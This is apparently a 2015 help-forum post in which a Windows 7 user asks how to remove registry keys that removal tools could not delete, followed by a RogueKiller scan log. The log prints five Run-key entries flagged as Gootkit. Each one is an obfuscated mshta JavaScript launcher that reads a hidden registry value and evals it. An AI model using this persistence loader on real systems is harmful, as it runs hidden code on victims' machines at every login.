No idea how this junk got on my machine, Been there since last week apparently since my two weeks ago history does not contain the slew of websites I'm apparently visiting without my knowledge. I'm guessing it was the result of a mis-click in Twitter that opened up one of those junk websites with the gallery-style stuff.
Whether this is my only problem of not isn't really my issue right now, my issue is these registry entries which will not go away. I don't like things that can't be removed. Tried manual, frst64, and RK. All three give some variant of a c0000034 error.
Attached is a portion of my IE History today with the rouge behavior opened up (Note there are no visuals to go with this history) and below is the export from the RougeKiller app showing the failure to remove the keys.
Appreciate any insight into removing these registry keys as I've scoured and can't find an answer not involving the software I've already used.
RogueKiller V10.10.2.0 [Aug 24 2015] by Adlice Software
mail :
http://www.adlice.com/contact/Feedback :
http://forum.adlice.comWebsite :
http://www.adlice.com/softwares/roguekiller/Blog :
http://www.adlice.comOperating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : mnewmark [Administrator]
Started from : C:\Users\mnewmark\Desktop\RogueKiller.exe
Mode : Delete -- Date : 08/25/2015 10:10:48
¤¤¤ Processes : 0 ¤¤¤
¤¤¤ Registry : 5 ¤¤¤
[Tr.Gootkit] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run | 3bd3bbe4 : mshta javascript:RXn9nR8A="R5Qlce36";ZO6=new%20ActiveXObject("WScript.Shell");szp3XXFGt="t";iK43kx=ZO6.RegRead("HKLM\\software\\Wow6432Node\\8c5470f52d\\e8128134");XM5uAlX5tN="Gn";eval(iK43kx);zuCUu7Ak7="C47";
[Tr.Gootkit] (X64) HKEY_USERS\S-1-5-21-1330083092-1246176775-4547331-8996\Software\Microsoft\Windows\CurrentVersion\Run | 3bd3bbe4 : mshta javascript:JqRl16HFbN="hYwnAH";k65V=new%20ActiveXObject("WScript.Shell");fO0RTHM="xfZtIVugO";a6HJe=k65V.RegRead("HKCU\\software\\8c5470f52d\\e8128134");jLW7dYt="lS9S";eval(a6HJe);ibKpo0i="H1UmWJZ";
[Tr.Gootkit] (X86) HKEY_USERS\S-1-5-21-1330083092-1246176775-4547331-8996\Software\Microsoft\Windows\CurrentVersion\Run | 3bd3bbe4 : mshta javascript:JqRl16HFbN="hYwnAH";k65V=new%20ActiveXObject("WScript.Shell");fO0RTHM="xfZtIVugO";a6HJe=k65V.RegRead("HKCU\\software\\8c5470f52d\\e8128134");jLW7dYt="lS9S";eval(a6HJe);ibKpo0i="H1UmWJZ";
[Tr.Gootkit] (X64) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | a175e83b : mshta javascript:JGAhca98="W";fR8=new%20ActiveXObject("WScript.Shell");Ht3OEjnc="OHFmj";r3u8hk=fR8.RegRead("HKLM\\software\\Wow6432Node\\8c5470f52d\\e8128134");BtlqKk48="UgEm";eval(r3u8hk);ZLFEU2KJ6="szH6jjYJn";
[Tr.Gootkit] (X86) HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | a175e83b : mshta javascript:JGAhca98="W";fR8=new%20ActiveXObject("WScript.Shell");Ht3OEjnc="OHFmj";r3u8hk=fR8.RegRead("HKLM\\software\\Wow6432Node\\8c5470f52d\\e8128134");BtlqKk48="UgEm";eval(r3u8hk);ZLFEU2KJ6="szH6jjYJn";
¤¤¤ Tasks : 0 ¤¤¤
¤¤¤ Files : 0 ¤¤¤
¤¤¤ Hosts File : 0 ¤¤¤
¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤
¤¤¤ Web browsers : 0 ¤¤¤
¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: ST320LT009-9WC142 +++++
--- User ---
[MBR] 0f9cd6a0e04d9b71ef0091cb9181989e
[BSP] 422ad3b656dc885c47c094f585cdf096 : HP|VT.Unknown MBR Code
Partition table:
0 - [XXXXXX] DELL-UTIL (0xde) [VISIBLE] Offset (sectors): 63 | Size: 39 MB
1 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 81920 | Size: 752 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
2 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 1622016 | Size: 304452 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 ... OK
User = LL2 ... OK